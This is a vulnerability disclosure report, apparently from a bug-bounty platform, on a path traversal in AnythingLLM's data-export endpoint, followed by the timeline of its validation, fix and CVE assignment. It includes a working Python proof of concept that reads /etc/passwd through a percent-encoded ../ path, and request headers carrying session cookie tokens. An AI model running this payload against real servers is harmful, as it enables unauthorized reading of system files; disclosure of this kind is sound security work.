Relative path traversal in mintplex-labs/anything-llm

Valid

Reported on Sep 2nd 2023

Description

The endpoint /system/data-exports/:filename is intended to serve an AnythingLLM data export zip file for download, selected by the filename parameter. However, a critical security vulnerability arises because the request.params.filename value is used without sufficient validation or sanitization. An attacker can exploit this to perform a relative path traversal attack (for example by supplying a percent-encoded ../ sequence), which can lead to unauthorized access to sensitive local files on the server.

Proof of Concept

import requests

url = "http://localhost:3001/api/system/data-exports/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64" # ../../../../../etc/passwd URL encoded all chars

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://localhost:3000/",
    "Cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY0ZjM1MTJlMWRiNDJhMzAzNjc5OWE4OSIsImlhdCI6MTY5MzY2NzY0MCwiZXhwIjoxNzI1MjAzNjQwfQ.FMcWpACDQExFVh4exkdcXmjh2uBPHDjvmXKB8u0Zyw8; sid=Fe26.2**a13f75a20d1ab29190513367825f331c6b83f698584b986bad7da63de5f91603*BSNwc-AmRY-DIS5FygAJww*uPTIhpPwf61Q2WpaEphYQ7n1wl_kjb1Ik59rIo50XoU0wqxPwHeKeldypcLPQZSYNxNMDE7o1i6P1izNZkhct7bEU0MueguXycEevdP2_BzSjwJm98wNQ-ZRo1ZR0FE8dTwCVw4Anh8f3fzRfICiBq36IiTk8fbA99PmxOB2fmhG3Z_58urj492H70XnR2t9Kd8MUO615ir6pbznH_w7ZzMRlWawO1Ktc8WF8HuCR4Mzis6-Onz38AYedjG81X3y**8e82b94d445bb10265f78b6ad89890011cc422e76676dd6171144c72ff7a63d4*KINx5ralgsUWwaYFkR8eD7nQgRMZtn7ovWYEmSn_wME",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-site",
    "Sec-Fetch-User": "?1"
}

response = requests.get(url, headers=headers)
print(response.text)

Impact

This vulnerability can lead to unauthorized access to sensitive files, data leakage, data manipulation, and even complete compromise of a system or application. This can result in significant financial loss, reputation damage, and legal consequences for organizations. It's a critical security issue that demands immediate attention and remediation.

Occurrences

We are processing your report and will contact the mintplex-labs/anything-llm team within 24 hours (19 days ago)
Abdelwahed Madani Yousfi modified the report (19 days ago)
Abdelwahed Madani Yousfi modified the report (19 days ago)
Abdelwahed Madani Yousfi modified the report (18 days ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md (18 days ago)
We have contacted a member of the mintplex-labs/anything-llm team and are waiting to hear back (12 days ago)
mintplex-labs/anything-llm maintainer validated this vulnerability (10 days ago)
Abdelwahed Madani Yousfi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
mintplex-labs/anything-llm maintainer gave praise (10 days ago)
Resolved by core team - thanks for disclosure!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
mintplex-labs/anything-llm maintainer marked this as fixed in 0.0.1 with commit 3c88ae (10 days ago)
The fix bounty has been dropped
This vulnerability has been assigned a CVE
mintplex-labs/anything-llm maintainer published this vulnerability (10 days ago)
system.js#L320 has been validated